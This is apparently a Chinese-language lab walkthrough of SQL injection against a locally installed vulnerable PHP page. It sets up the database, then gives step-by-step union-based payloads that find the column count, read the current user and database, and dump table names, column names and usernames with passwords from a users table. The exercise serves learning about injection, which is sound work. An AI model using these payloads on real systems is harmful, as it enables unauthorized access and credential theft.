1.创建数据库
2.导入sql文件
3.修改index.php中数据库连接参数（账号、密码），使其与本机MySQL/phpMyAdmin的登录凭据一致
4.尝试' or 1=1 ,页面返回数据库报错信息,说明输入被直接拼接进SQL语句且参数是用单引号包裹的（单引号提前闭合导致语法错误）。
5.输入admin' order by 3;-- +会返回正确页面,而输入admin' order by 4;-- +会报错,说明原查询的结果集有3列（注意MySQL中--后必须有空格,-- +经URL解码后+变为空格）
6.admin' order by 4;-- +会报错
7.admin' and 1=2 union select 1,user(),database();-- +,and 1=2使原查询不返回行,以便回显位显示union部分的结果:user()为当前数据库用户,database()为当前库名
8.构造payload查询表名
admin' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=web23;-- +,此处payload构造错误: web23未加引号会被当作列名而不是字符串,应写成table_schema='web23'或直接使用table_schema=database()。
admin' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database();-- +
9.构造payload查询列名 admin' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users';-- +（建议加上and table_schema=database(),否则其他库中同名的users表的列也会被一并返回）
10.构造payload查询字段 admin' and 1=2 union select 1,2,group_concat(num,0x3a,username,0x3a,password) from users;-- +,此处0x3a是字符':'的ASCII码（十六进制）,用作字段间的分隔符,且不需要使用引号
admin' and 1=2 union select 1,2,group_concat(num,0x2a,username,0x2a,password) from users;-- +,此处0x2a是字符'*'的ASCII码（十六进制）,同样作为分隔符